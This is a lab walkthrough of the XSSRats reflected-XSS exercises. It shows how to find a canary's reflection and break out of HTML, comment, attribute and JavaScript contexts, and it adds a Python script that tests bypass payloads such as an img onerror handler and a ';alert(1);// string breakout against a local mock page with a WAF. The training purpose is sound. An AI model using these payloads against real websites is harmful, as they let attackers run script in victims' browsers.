XSS Survival Guide Labs
Labs from XSSRats
HTML simple context
Lab 10
Step 1: Enter some gibberish into the input field and check where it is reflected on the page.
Step 2: Check whether you can escape the HTML context
Inserting a tag name that does not exist in HTML avoids being blocked by a tag-name filter while still showing whether the browser renders our markup.
The image below shows that we could successfully escape the context and insert HTML tags into the page.
Step 3: Crafting an XSS payload
Now that we have successfully escaped the context, we can try to craft a payload that fires an XSS.
The <script></script> tag seemed to be blocked by the WAF, but using the <img/> tag we were able to fire an XSS.
HTML comments context
Lab 20
Step 1: Enter a canary in the input field and identify where it is reflected on the page
From the image below we can observe that our canary gets reflected inside an HTML comment.
Step 2: Break out of the context
This payload was used to break out of the context.
Step 3: Create an appropriate payload
This payload was used to fire a XSS.
HTML tag attribute context
Lab 30
Step 1: As usual, we insert a canary and look where it gets reflected in the source code.
The image below shows that the canary gets reflected inside the value attribute of a tag.
Step 2: Escaping the value attribute context
We tried several payloads to escape the context.
The following payloads did not work.
However, we could escape the context with a single quote (').
When trying to escape an HTML attribute context, try both single (') and double (") quotes: which one works depends on how the attribute value is delimited in the page source.
Step 3: Craft an appropriate payload
The payload that allowed us to fire an XSS was:
Javascript context
Lab 40
Step 1: Identify where our input gets reflected
In this lab, the input gets reflected within a JavaScript function.
Step 2: Break out of the context and fire an XSS
To break out of the context, we inserted the following payload.
Since we are already in a JavaScript context, we did not need a <script> tag to fire an XSS. The // at the end comments out the rest of the JavaScript that follows our payload, so the script stays syntactically valid and our code runs.
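The three-step method used in Labs 10, 20, 30 and 40 (canary, breakout, payload) can be scripted against a local model of the target. The block below is an added example, not code from XSSRats or the labs: it reflects input into the four contexts covered here (plain HTML, HTML comment, single-quoted attribute value, single-quoted JavaScript string) using constructed page templates and an assumed WAF rule that only blocks the literal <script tag, as observed in Lab 10. find_context() answers Step 1 (where does the canary land?) with Python's html.parser, and probe() answers Steps 2 and 3 by checking whether a payload produces an event-handler attribute on a tag the browser will parse, or, for the script context, whether the marker ends up outside a string literal and not behind a // comment.

```python
import re
from html.parser import HTMLParser

# Constructed stand-in for the lab application (not XSSRats' code): the same
# input is reflected into each of the four contexts covered by Labs 10-40.
TEMPLATES = {
    "html": "<p>Search results for: {inp}</p>",
    "comment": "<!-- query: {inp} --><p>No results</p>",
    "attribute": "<input type='text' name='q' value='{inp}'>",
    "js": "<script>var q = '{inp}'; track(q);</script>",
}

def waf(inp):
    """Assumed WAF rule: only the literal <script tag is blocked, as in Lab 10."""
    return re.search(r"<\s*script", inp, re.I) is not None

def render(context, inp):
    """Render the mock page, or None when the WAF rejects the input."""
    return None if waf(inp) else TEMPLATES[context].format(inp=inp)

class ContextFinder(HTMLParser):
    """Step 1 of every lab: record where a canary (or payload marker) lands."""
    def __init__(self, needle):
        super().__init__()
        self.needle = needle
        self.hits = []      # (kind, attribute name or None)
        self.scripts = []   # raw bodies of <script> elements
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for name, value in attrs:
            if value and self.needle in value:
                self.hits.append(("attribute", name))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)
        if self.needle in data:
            self.hits.append(("js" if self.in_script else "text", None))

    def handle_comment(self, data):
        if self.needle in data:
            self.hits.append(("comment", None))

def js_executes(body, marker):
    """Crude JS scan: True if marker sits outside string literals and // comments."""
    i, quote = 0, None
    while i < len(body):
        c = body[i]
        if quote:
            if c == "\\":
                i += 1                # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"`":
            quote = c
        elif body.startswith("//", i):
            nl = body.find("\n", i)
            if nl == -1:
                return False          # rest of the script is commented out
            i = nl
        elif body.startswith(marker, i):
            return True
        i += 1
    return False

def find_context(context, canary="canary123"):
    """Step 1: where does the canary land? e.g. [('comment', None)]."""
    p = ContextFinder(canary)
    p.feed(render(context, canary))
    p.close()
    return p.hits

def probe(context, payload, marker="alert(1)"):
    """Steps 2+3: True if the payload ends up in an executable position."""
    page = render(context, payload)
    if page is None:
        return False                  # blocked by the WAF
    p = ContextFinder(marker)
    p.feed(page)
    p.close()
    if any(name.startswith("on") for kind, name in p.hits if kind == "attribute"):
        return True                   # event handler on a tag the browser parses
    return any(js_executes(body, marker) for body in p.scripts)

if __name__ == "__main__":
    for ctx in TEMPLATES:
        print(ctx, find_context(ctx))
    for ctx, payload in [("html", "<script>alert(1)</script>"),
                         ("html", "<img src=x onerror=alert(1)>"),
                         ("comment", "--><img src=x onerror=alert(1)>"),
                         ("attribute", "' autofocus onfocus=alert(1) x='"),
                         ("js", "';alert(1);//")]:
        print(ctx, repr(payload), probe(ctx, payload))
```

Running it reproduces the lessons of each lab: the <script> payload is dropped by the WAF while the <img> payload fires in the HTML context; an <img> payload without a leading --> stays inert inside the comment; a double-quote breakout leaves the payload inside the single-quoted value attribute, whereas a single-quote breakout adds an onfocus handler; and in the script context an HTML tag stays inside the string literal, while ';alert(1);// closes the string and comments out the rest of the line. The JS check is deliberately a rough tokenizer, not a parser: it is enough for the single-quoted string in these labs but does not model template literals, regex literals or block comments.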